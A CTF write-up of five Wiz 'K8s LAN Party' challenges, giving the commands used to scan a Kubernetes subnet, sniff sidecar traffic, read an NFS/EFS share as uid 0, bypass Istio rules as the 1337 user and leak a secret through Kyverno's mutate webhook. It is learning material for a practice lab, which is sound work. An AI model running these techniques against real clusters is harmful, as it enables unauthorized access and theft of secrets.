# Hackwekend Session 6 - Cloud Security (Network and Red Team) > Hi @all, that been a week and as usual, hackwekend session will be back with new topic, today we continuously learn about Cloud Security but more about Red team which can bring to you very cool technical hosted by Wiz.io. Let's digest :thumbsup: ![image](https://hackmd.io/_uploads/Skd1oXrG0.png) Link to challenge: https://k8slanparty.com/ ## Challenge 1: Recon - DNSing with the stars Description > You have shell access to compromised a Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further. > > As a warmup, utilize [DNS scanning](https://thegreycorner.com/2023/12/13/kubernetes-internal-service-discovery.html#kubernetes-dns-to-the-partial-rescue) to uncover hidden internal services and obtain the flag. We have "loaded your machine with [dnscan](https://gist.github.com/nirohfeld/c596898673ead369cb8992d97a1c764e) to ease this process for further challenges. Hint 1 > Make sure you scan the correct subnet. You can get a hint of what the correct subnet is by looking at the Kubernetes API server address in the machine’s environment variables. Hinh 2 > The cluster subnet is ### Analysis ![image](https://hackmd.io/_uploads/ryDtT64fR.png) On this challenge, it talk about recon step, which important part when you try attack or pentest some target in internet. Because of, this endpoint will place where put the exploit or payload, if you don't find anything about that you can't do anything With some hint, you will know about mission is scan and findout what DNS or IP can attack from your shell. It mean you need to know about knowledge about networking and CIDR. Learn more with below contents - [What is CIDR ?](https://aws.amazon.com/what-is/cidr/) - [What is DNS ?](https://www.fortinet.com/resources/cyberglossary/what-is-dns) - [Networking](https://www.cloudflare.com/learning/network-layer/how-does-the-internet-work/) ### Solve and retrieve the flag With this type challenge and hint 1, you already know about target is network, we need to scan dns for find about stuff. Dns will help you resolve what ip of target ![image](https://hackmd.io/_uploads/HJIgU0NfA.png) First of all, check currently interface by `ifconfig` command, it will show us about network already in shell ![image](https://hackmd.io/_uploads/ByU2XCVzA.png) If you check around this network you can see the subnetmask of `ns-1262e6` is too small, ``, It just only 2 network in that subnet ![image](https://hackmd.io/_uploads/rygxSAEG0.png) You can play with network and learn about CIDR or VLSM by [CIDR / VLSM Calculator](https://www.subnet-calculator.com/cidr.php). It means, network attact with interface is not actually target, you think about kubernetes network because we play inside the pod. To find the network, it often export into the enviroment variables. You can use `env` command to list of them ![image](https://hackmd.io/_uploads/rJdorRVGC.png) But take a guess network range of CIDR because it just expose kubernetes host `` and don't take about netmask, it means we need bruteforce to find target, two CIDR we focus on - (256 network) - (65543 network) First try with `/24`, you don't get anything it means the other situation can be choiced `/16` **(Hint 2: give you respect, not waste much time to wait :smile:)** ```bash dnscan -subnet <CIDR or Wildcard> # (valid: ``` ![image](https://hackmd.io/_uploads/SktTPnezA.png) After you find the target, IP and DNS. You can test simple request to target with `curl` command, if req is resq, it means HTTP work on that host ```bash curl ``` ![image](https://hackmd.io/_uploads/Syg9O3eGA.png) You get the flag, that just raw-string from target Flag: wiz_k8s_lan_party{between-thousands-xxx-xxx-xxx-found-your-northen-star} ### Conclusion ![image](https://hackmd.io/_uploads/rkgYORNGC.png) > Simple challenge, but you need to do step by step to find the target. Always, Giving time for reconnaissance and you will not ever disappointed ## Challenge 2: Find neighboors - Hello ? Description > Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets. Hint 1 > The sidecar container shares the same lifecycle, resources, and network namespace as the main container. Hint 2 > The machine is preloaded with `tcpdump` and can be used to sniff the sidecar's network traffic. ### Analysis Hold on, this challenge will give a chance for learning how can we capture the traffic transfer between network, browser, ... So that will give you think about if not setup `HTTPS`, your credentials can expose when some one do MITM attack (Man in the middle) on your network ![image](https://hackmd.io/_uploads/rko9KANMC.png) ### Solve and retrieve the flag Back to challenge 1, you need to find the the target with `dnscan` in network, ```bash dnscan -subnet ``` Result ![image](https://hackmd.io/_uploads/SJfesAEfA.png) ``` reporting-service.k8s-lan-party.svc.cluster.local ``` When you know about target, you need to use `tcpdump` to sniff and capture the contents communicate on the network, and that time network interface is actually helpful ```bash # find your interface by ifconfig or ip addr tcpdump -i <net-interface> host reporting-service.k8s-lan-party.svc.cluster.local -A # Like me (ns-faf90c) ``` ![image](https://hackmd.io/_uploads/SklAdu4M0.png) Note: Use flag `-A` to fetch the contents inside the package, and raw flag will expose ![image](https://hackmd.io/_uploads/SJ62OuEGC.png) And your flag will reveal when you read each package not have capture, it doesn't encrypt or mask something :smile: Flag: wiz_k8s_lan_party{good-crime-comes-xxx-xxx-xxx-in-a-sidecar} ### Conclusion > On this challenge, you learn the way to capture and sniff the network packet transfer through internet, if you not apply any protection, hacker can capture and let't them know you are the target. Therefore, careful when apply or supply the credentials, password or anything private to anonymous website or non't `https` web Learn more about the protection - [Man in the Middle (MITM) Attacks](https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/) - [Why use HTTPS?](https://www.cloudflare.com/learning/ssl/why-use-https/) ## Challenge 3: Data Leakage - Exposed File Share Description > The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦‍️. Hint 1 > You might find it useful to look at the [documentaion](https://github.com/sahlberg/libnfs) for nfs-cat and nfs-ls. Hint 2 > The following NFS parameters should be used in your connection string: version, uid and gid ### Analysis Through this challenge, you require to read private contents which put on machine and expose via network like description You will need skill and knowledge to actually figure out this challenge work - [Network File System](https://en.wikipedia.org/wiki/Network_File_System) - [How to Mount an NFS Share in Linux](https://linuxize.com/post/how-to-mount-an-nfs-share-in-linux/) ![image](https://hackmd.io/_uploads/ry5QJ1Sf0.png) This challenge has a very interesting approach and has many tricks for players to test their patience ### Solve and retrieve the flag To know what tool we have, you need find `$PATH` to find binary directory, and yup we find `nfs` ```bash echo $PATH ls -la /usr/local/bin ``` ![image](https://hackmd.io/_uploads/rJRxlJSzA.png) So base on the [hacktricks - 2049 - Pentesting NFS Service](https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting), you can use `nmap` to validate nfs is open in this host ```bash nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 ``` ![image](https://hackmd.io/_uploads/B1YBlkBMC.png) nfs protocol actually work, and you make a deal with that ![image](https://hackmd.io/_uploads/rJoRgkrz0.png) After recon and discovery about folder in the host, there is at least `flag.txt` contain inside the pod on `/efs/flag.txt` path, but we do not permission to read them ![image](https://hackmd.io/_uploads/H1PZlbfzR.png) Found mount directory, and try to figure out the target 1. First i make mistake, just use `showmount -e` and not work, just digest about that but not get any results 2. So for further step i try to find method via [writeup](https://infrasec.sh/post/wiz_k8s_lan_party/), I just figure out we can list all directory in host with `df` command instead of `showmount` ```bash df -a ``` ![image](https://hackmd.io/_uploads/Synzx-fzA.png) After that got the list of directory, take a look around the domain which `efs` service of aws, with `dig` command to figure out the ip of your directory or just use this url, :smiling_face_with_smiling_eyes_and_hand_covering_mouth: ```bash dig +short A fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com ``` ![image](https://hackmd.io/_uploads/By6oy-GMC.png) Next, we use `nfs-ls` command, and you can list the what contents inside the mount (NOTE: With hint2, remember provide version to can execution this command successfully) ```bash nfs-ls nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/?version=4 ``` ![image](https://hackmd.io/_uploads/SklO-bzG0.png) Figure out `nfs-cat` to read contents inside the `flag.txt` file It's insane format, when you put only `/` on the request, your request will return error ```bash nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/flag.txt?version=4" ``` ![image](https://hackmd.io/_uploads/SktYQ-MGA.png) It's mean you must need to define another guess for this efs, like pentester they often add another slash, and it works :sweat_smile: ```bash nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4" ``` ![image](https://hackmd.io/_uploads/HkHu4ZGGC.png) As you know, this challenge is messup and we ain't gonna get the flag, with hint2, we need to provide uid or guid for read the contents. First of all, take a back to the `nfs.conf` for looking the configuration ```json # # This is a general configuration for the # NFS daemons and tools # [general] pipefs-directory=/run/rpc_pipefs # [exports] # rootdir=/export # [exportfs] # debug=0 # [gssd] # verbosity=0 # rpc-verbosity=0 # use-memcache=0 # use-machine-creds=1 # use-gss-proxy=0 # avoid-dns=1 # limit-to-legacy-enctypes=0 # context-timeout=0 # rpc-timeout=5 # keytab-file=/etc/krb5.keytab # cred-cache-directory= # preferred-realm= # [lockd] # port=0 # udp-port=0 # [mountd] # debug=0 manage-gids=y # descriptors=0 # port=0 # threads=1 # reverse-lookup=n # state-directory-path=/var/lib/nfs # ha-callout= # [nfsdcld] # debug=0 # storagedir=/var/lib/nfs/nfsdcld # [nfsdcltrack] # debug=0 # storagedir=/var/lib/nfs/nfsdcltrack # [nfsd] # debug=0 # threads=8 # host= # port=0 # grace-time=90 # lease-time=90 # udp=n # tcp=y # vers2=n # vers3=y # vers4=y # vers4.0=y # vers4.1=y # vers4.2=y # rdma=n # rdma-port=20049 # [statd] # debug=0 # port=0 # outgoing-port=0 # name= # state-directory-path=/var/lib/nfs/statd # ha-callout= # no-notify=0 # [sm-notify] # debug=0 # force=0 # retry-time=900 # outgoing-port= # outgoing-addr= # lift-grace=y # [svcgssd] # principal= ``` Not actually helpful, so we can guess with currently shell uid=player(1001) ```bash nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=1001" ``` ![image](https://hackmd.io/_uploads/B1P_r-GGR.png) Not right, try another guess, pick up the root id, i mean we set uid=0 ```bash nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=0" ``` and flag is revealed ![image](https://hackmd.io/_uploads/H1SPLbMMA.png) Flag: wiz_k8s_lan_party{old-school-network-file-shares-xxx-xxx-cloud!} ### Conclusion > Through the challenge, you will learn a lot about the patience, analysis and do more searching about technical can attack the machine, Actually I need to learn more about that :smile:. But that is actually cool experience, `NFS` can do a lot but if you not protect, anything and `NFS` could be turn to targer for exploiting Learn more about NFS, common attack methodology with [What Are the Dangers Of a NFS Vulnerability Or Attack?](https://bestcybersecuritynews.com/what-are-the-dangers-of-a-nfs-vulnerability-or-attack/?feed_id=5202&_unique_id=653275f0d2d12) ## Challenge 4: Bypasssing Boundaries - The Beauty and The Ist Description > Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don't abuse this power; use it responsibly and with caution. ![image](https://hackmd.io/_uploads/ryeTPbzzR.png) Hint 1 > Try examining [Istio's IPTables rules](https://github.com/istio/istio/wiki/Understanding-IPTables-snapshot#use-pid-to-get-iptables). Hint 2 > Try executing "cat /etc/passwd | grep 1337", to find the user that can bypass the Istio's IPTables rules ### Analysis On this challenge, you back again to one of concept of Kubernetes, service mesh > <h3>What is a service mesh? </h3> > > A service mesh is a software layer that handles all communication between services in applications. This layer is composed of containerized microservices. As applications scale and the number of microservices increases, it becomes challenging to monitor the performance of the services. To manage connections between services, a service mesh provides new features like monitoring, logging, tracing, and traffic control. It’s independent of each service’s code, which allows it to work across network boundaries and with multiple service management systems. With service mesh, you can handle and do lots of things, like Service discovery, Load balancing, Traffic management, ... Explore more: [What is a Service Mesh?](https://aws.amazon.com/what-is/service-mesh/) ![image](https://hackmd.io/_uploads/S1HkoMrGA.png) And istio is one of names of service mesh, that use popular like a part of cluster kubernetes when setup, and your challenge is find the way to bypass the restricted route of istio and reveal the flag ### Solve and retrieve the flag First of all, we scan the dns of target which we need to attack by `dnscan ```bash dnscan -subnet 10.100.*.* ``` Result scan ![image](https://hackmd.io/_uploads/rJHbaGrM0.png) ```bash! -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local. ``` Next, I try access with `GET POST` method, but you will not have permission for access them because `RBAC` applied by istio, it means we need to find the bypass the them ![image](https://hackmd.io/_uploads/H1nmafrzA.png) With hint 1, they talk about play ip table, so you can explore istio's ip tables with some articles - [Understanding The Sidecar Injection, Traffic Intercepting & Routing Process In Istio](https://jimmysong.io/en/blog/sidecar-injection-iptables-and-traffic-routing/) - [Traffic types and iptables rules in Istio sidecar explained](https://tetrate.io/blog/traffic-types-and-iptables-rules-in-istio-sidecar-explained/) - [Medium - Sidecar injection, transparent traffic hijacking, and routing process in Istio explained in detail](https://jimmysongio.medium.com/sidecar-injection-transparent-traffic-hijacking-and-routing-process-in-istio-explained-in-detail-d53e244e0348) With a try, you will know about the istio user is really exist, with IPTable, I mean we can manipulate the access with another user because it's relating on the description. And from hint 1, you will have some information about UID and GID about `1337` account, it user for proceed the traffic from sidecar to another sidecar. Explore more: [Understanding IPTables snapshot](https://github.com/istio/istio/wiki/Understanding-IPTables-snapshot#use-pid-to-get-iptables) ![image](https://hackmd.io/_uploads/HJVPRzBfC.png) so you can switch user into `istio` to bypass the currently root user, like a trick from this implementation, i know it when open the hint 2 ![image](https://hackmd.io/_uploads/ByJaDFmzC.png) You can switch user by `su` command ```bash su - istio ``` ![image](https://hackmd.io/_uploads/HyQSdtmGR.png) Yup we go to the another user, `istio`, so it mean we can bypass the rule whch service mesh apply which try prevent us get flag from host. Try again and reveal the flag ```bash curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local. ``` ![image](https://hackmd.io/_uploads/HyoauYQzR.png) Flag: wiz_k8s_lan_party{only-leet-hex0rs-xxx-xxx-both-k8s-and-linux} ### Conclusion > Through the challenge, new experience when target is `istio`, first try always hard but this quite fun challenge, easy methodology but you must to understand the concept and bypass them. Not thing is always securing, therefore you must to learn and how to restrict more as possible ![image](https://hackmd.io/_uploads/HJJWlXBGR.png) [More best practices with istio](https://istio.io/latest/docs/ops/best-practices/security/) ## Challenge 5: Lateral movement - Who will guard the guardians? Description > Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative ![image](https://hackmd.io/_uploads/Sy3acKQG0.png) Hint 1 > Need a hand crafting AdmissionReview requests? Checkout https://github.com/anderseknert/kube-review. Hint 2 > This exercise consists of three ingredients: kyverno's hostname (which can be found via dnscan), the relevant HTTP path (which can be found in Kyverno's source code) and the AdmissionsReview request. ### Analysis Last challenge, Very cool and strange vulnerables which not see as usual - [lateral movement](https://www.cloudflare.com/learning/security/glossary/what-is-lateral-movement/). It can bring more the interesting when it comes up with [`kyverno`](https://kyverno.io/) - agent policy with work on cluster and provide the method to secure, protect data and permission in kubernetes ![image](https://hackmd.io/_uploads/SJe5ZXHzA.png) With challenge, you need to retrieve the flag from `mutate` webhook of `kyverno` but more sophisticated via `AdmissionsReview` to bypass and execute `lateral movement` attack, let digest about that ### Solve and retrieve the flag First of all, use `dnscan` to get the target for attack process, we have a ton of endpoints ```json -> kyverno-cleanup-controller.kyverno.svc.cluster.local. -> kyverno-svc-metrics.kyverno.svc.cluster.local. -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local. -> kyverno-background-controller-metrics.kyverno.svc.cluster.local. -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local. -> kyverno-svc.kyverno.svc.cluster.local. ``` With the hint, i figure out we need attack to pod with kyverno via `mutate` by HTTP request, supply chain with `AdmissionReview`. It means, you need to figure play with smt to create `AdmissionReview` to bypass or provide when you do command `run` for request to `mutate` route and get the flag from response. With hint 1, This challenge suggest about [kube-review - Create Kubernetes AdmissionReview requests from Kubernetes resource manifests](https://github.com/anderseknert/kube-review) So we can perfomance that like example, with few step - I do love with `debian`, so i always try to create a pod with debian also ```bash k run playkube --image=debian:11.7 --dry-run=client -o yaml > playkube.yaml ; ``` this command will create a pod on the manifest with not apply to cluster, `tail -f /dev/null` is the stuff give a change for always keep shell run for `debian` or `ubuntu`. Read more: [StackOverFlow - How can I keep a container running on Kubernetes?](https://stackoverflow.com/questions/31870222/how-can-i-keep-a-container-running-on-kubernetes), you can change that inside the manifest **(Not recommendation: when you try with `--command`, IDK why not work but when you create pod it will fail, make sure split them better than combine to one)** Output ```yaml # playkube.yaml apiVersion: v1 kind: Pod metadata: creationTimestamp: null labels: run: playkube name: playkube spec: containers: - command: - "sh" - "-c" - "tail -f /dev/null" image: debian:11.7 name: playkube resources: {} dnsPolicy: ClusterFirst restartPolicy: Always status: {} ``` - Install kube-review to create a Admissionreview ```bash wget https://github.com/anderseknert/kube-review/releases/download/v0.3.0/kube-review-linux-amd64 -O kube-review; ``` and you will kube-review on your shell, change mod execution and play with `kube-review` ```bash chmod +x kube-review ./kube-review create playkube.yaml > playkube.json ``` Output ```yaml # playkube.json { "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1", "request": { "uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115", "kind": { "group": "", "version": "v1", "kind": "Pod" }, "resource": { "group": "", "version": "v1", "resource": "pods" }, "requestKind": { "group": "", "version": "v1", "kind": "Pod" }, "requestResource": { "group": "", "version": "v1", "resource": "pods" }, "name": "playkube", "operation": "CREATE", "userInfo": { "username": "kube-review", "uid": "5f04e525-a601-4098-89e2-45bee89f96d7" }, "object": { "kind": "Pod", "apiVersion": "v1", "metadata": { "name": "playkube", "creationTimestamp": null, "labels": { "run": "playkube" } }, "spec": { "containers": [ { "name": "playkube", "image": "debian:11.7", "command": [ "sh", "-c", "tail -f /dev/null" ], "resources": {} } ], "restartPolicy": "Always", "dnsPolicy": "ClusterFirst" }, "status": {} }, "oldObject": null, "dryRun": true, "options": { "kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1" } } } ``` - Always already, next step you need to learn how kyverno work, like what HTTP request with `mutate` mean First of all kyverno work on port `443`, it means you need to provide request with `https` to actually access kyverno, but actually on this step i don't figure out anything, and [Morteza Khazamipour - writeup](https://blog.morteza.dev/k8slanparty-challenge-5-lateral-movement-8b568796c7e8) is actually help me. He spoils me about `Kyverno` path which not relate anything in documentation, so here is it [file](https://github.com/kyverno/kyverno/blob/main/pkg/config/config.go#L56) about `webhook mutate` provide by kyverno. Therefore, i have completely exploitation `curl` for reaching the flag, but before doing that you need to mount `json` to your pod, use `cat` ```bash cat <<EOF > pod.json { "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1", "request": { "uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115", "kind": { "group": "", "version": "v1", "kind": "Pod" }, "resource": { "group": "", "version": "v1", "resource": "pods" }, "requestKind": { "group": "", "version": "v1", "kind": "Pod" }, "requestResource": { "group": "", "version": "v1", "resource": "pods" }, "name": "playkube", "operation": "CREATE", "userInfo": { "username": "kube-review", "uid": "5f04e525-a601-4098-89e2-45bee89f96d7" }, "object": { "kind": "Pod", "apiVersion": "v1", "metadata": { "name": "playkube", "creationTimestamp": null, "labels": { "run": "playkube" } }, "spec": { "containers": [ { "name": "playkube", "image": "debian:11.7", "command": [ "sh", "-c", "tail -f /dev/null" ], "resources": {} } ], "restartPolicy": "Always", "dnsPolicy": "ClusterFirst" }, "status": {} }, "oldObject": null, "dryRun": true, "options": { "kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1" } } } EOF ``` after that, you can build `curl` command, like ```bash! curl --insecure -H "Content-Type: application/json" --data-binary "@pod.json" -X POST "https://kyverno-svc.kyverno.svc.cluster.local/mutate" | jq ``` Output ```bash { "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1", "request": { "uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115", "kind": { "group": "", "version": "v1", "kind": "Pod" }, "resource": { "group": "", "version": "v1", "resource": "pods" }, "requestKind": { "group": "", "version": "v1", "kind": "Pod" }, "requestResource": { "group": "", "version": "v1", "resource": "pods" }, "name": "playkube", "operation": "CREATE", "userInfo": { "username": "kube-review", "uid": "5f04e525-a601-4098-89e2-45bee89f96d7" }, "object": { "kind": "Pod", "apiVersion": "v1", "metadata": { "name": "playkube", "creationTimestamp": null, "labels": { "run": "playkube" } }, "spec": { "containers": [ { "name": "playkube", "image": "debian:11.7", "command": [ "sh", "-c", "tail -f /dev/null" ], "resources": {} } ], "restartPolicy": "Always", "dnsPolicy": "ClusterFirst" }, "status": {} }, "oldObject": null, "dryRun": true, "options": { "kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1" } }, "response": { "uid": "2abab0c1-89ef-44c5-a6ae-e6736146b115", "allowed": true } } ``` But failure, because we make a mistake, pod should be run in the namespace and we do not, so change the `playkube.yaml` with `metadata.namespace: sensitive-ns` ```yaml # playkube.yaml apiVersion: v1 kind: Pod metadata: creationTimestamp: null labels: run: playkube name: playkube namespace: sensitive-ns spec: containers: - command: - "sh" - "-c" - "tail -f /dev/null" image: debian:11.7 name: playkube resources: {} dnsPolicy: ClusterFirst restartPolicy: Always status: {} ``` Apply `kube-review` again and put it to json ```json { "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1", "request": { "uid": "ca6a6def-925c-436f-98e2-d135604219b8", "kind": { "group": "", "version": "v1", "kind": "Pod" }, "resource": { "group": "", "version": "v1", "resource": "pods" }, "requestKind": { "group": "", "version": "v1", "kind": "Pod" }, "requestResource": { "group": "", "version": "v1", "resource": "pods" }, "name": "playkube", "namespace": "sensitive-ns", "operation": "CREATE", "userInfo": { "username": "kube-review", "uid": "bd6a3823-8e4e-44d3-bd70-8309b58d619c" }, "object": { "kind": "Pod", "apiVersion": "v1", "metadata": { "name": "playkube", "namespace": "sensitive-ns", "creationTimestamp": null, "labels": { "run": "playkube" } }, "spec": { "containers": [ { "name": "playkube", "image": "debian:11.7", "command": [ "sh", "-c", "tail -f /dev/null" ], "resources": {} } ], "restartPolicy": "Always", "dnsPolicy": "ClusterFirst" }, "status": {} }, "oldObject": null, "dryRun": true, "options": { "kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1" } } } ``` mount to pod.json and run `curl` command above, you shell will response, what you need ```bash cat <<EOF > pod.json { "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1", "request": { "uid": "ca6a6def-925c-436f-98e2-d135604219b8", "kind": { "group": "", "version": "v1", "kind": "Pod" }, "resource": { "group": "", "version": "v1", "resource": "pods" }, "requestKind": { "group": "", "version": "v1", "kind": "Pod" }, "requestResource": { "group": "", "version": "v1", "resource": "pods" }, "name": "playkube", "namespace": "sensitive-ns", "operation": "CREATE", "userInfo": { "username": "kube-review", "uid": "bd6a3823-8e4e-44d3-bd70-8309b58d619c" }, "object": { "kind": "Pod", "apiVersion": "v1", "metadata": { "name": "playkube", "namespace": "sensitive-ns", "creationTimestamp": null, "labels": { "run": "playkube" } }, "spec": { "containers": [ { "name": "playkube", "image": "debian:11.7", "command": [ "sh", "-c", "tail -f /dev/null" ], "resources": {} } ], "restartPolicy": "Always", "dnsPolicy": "ClusterFirst" }, "status": {} }, "oldObject": null, "dryRun": true, "options": { "kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1" } } } EOF curl --insecure -H "Content-Type: application/json" --data-binary "@pod.json" -X POST "https://kyverno-svc.kyverno.svc.cluster.local/mutate" | jq ``` Output ```json { "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1", "request": { "uid": "ca6a6def-925c-436f-98e2-d135604219b8", "kind": { "group": "", "version": "v1", "kind": "Pod" }, "resource": { "group": "", "version": "v1", "resource": "pods" }, "requestKind": { "group": "", "version": "v1", "kind": "Pod" }, "requestResource": { "group": "", "version": "v1", "resource": "pods" }, "name": "playkube", "namespace": "sensitive-ns", "operation": "CREATE", "userInfo": { "username": "kube-review", "uid": "bd6a3823-8e4e-44d3-bd70-8309b58d619c" }, "object": { "kind": "Pod", "apiVersion": "v1", "metadata": { "name": "playkube", "namespace": "sensitive-ns", "creationTimestamp": null, "labels": { "run": "playkube" } }, "spec": { "containers": [ { "name": "playkube", "image": "debian:11.7", "command": [ "sh", "-c", "tail -f /dev/null" ], "resources": {} } ], "restartPolicy": "Always", "dnsPolicy": "ClusterFirst" }, "status": {} }, "oldObject": null, "dryRun": true, "options": { "kind": "CreateOptions", "apiVersion": "meta.k8s.io/v1" } }, "response": { "uid": "ca6a6def-925c-436f-98e2-d135604219b8", "allowed": true, "patch": "W3sib3AiOiJhZGQiLCJwYXRoIjoiL3NwZWMvY29udGFpbmVycy8wL2VudiIsInZhbHVlIjpbeyJuYW1lIjoiRkxBRyIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9XX0sIHsicGF0aCI6Ii9tZXRhZGF0YS9hbm5vdGF0aW9ucyIsIm9wIjoiYWRkIiwidmFsdWUiOnsicG9saWNpZXMua3l2ZXJuby5pby9sYXN0LWFwcGxpZWQtcGF0Y2hlcyI6ImluamVjdC1lbnYtdmFycy5hcHBseS1mbGFnLXRvLWVudi5reXZlcm5vLmlvOiBhZGRlZCAvc3BlYy9jb250YWluZXJzLzAvZW52XG4ifX1d", "patchType": "JSONPatch" } } ``` Yup, we got it the patch contents with base64, you just need to decode them, with jq, it can be easily to executed like ```bash! curl --insecure -H "Content-Type: application/json" --data-binary "@pod.json" -X POST "https://kyverno-svc.kyverno.svc.cluster.local/mutate" | jq -r ".response.patch" | base64 -d | xargs ``` ![image](https://hackmd.io/_uploads/BJiyddEMR.png) Flag: wiz_k8s_lan_party{you-are-k8s-net-xxx-xxx-xxx-xxx-to-mutate-your-way-to-victory} ### Conclusion > This challenge is very interesting, new supply chain and attack methodology which can exploit and reveal secrets about them. I will have a post or blog to talk more about this one. Kyverno is part of cluster which offer you more optionals to protect and retrict the access to data. More thing on this challenge need to be research, very cool challenge. ![image](https://hackmd.io/_uploads/r19ZEXHGA.png) # Conclusion ![image](https://hackmd.io/_uploads/BkdSF_VMA.png) > I hope you have good time and enjoy with the challenge from wiz.io, i respect and appricate what things they bring for community. I learn a lot about new methodology and supply chain attack, with practice more about red team skill and try to learn more about technologies, especially Kubernetes. :smile: > Maybe on next session, we will continue find out a cool things and try more challenge from others resources. Stay safe, hack and do more fun things. Be back on the next session. see ya !!! ![image](https://hackmd.io/_uploads/SJhXBXHG0.png) You can find me on: - [🌐 Website - Xeus Nguyen Wiki](https://wiki.xeusnguyen.xyz/) - [📖 Github - Xeus Territory](https://github.com/Xeus-Territory) - [☁️ Twitter - Xeus Nguyen](https://twitter.com/XeusNguyen) - [⭐ Medium - Xeus Nguyen](https://medium.com/@XeusNguyen)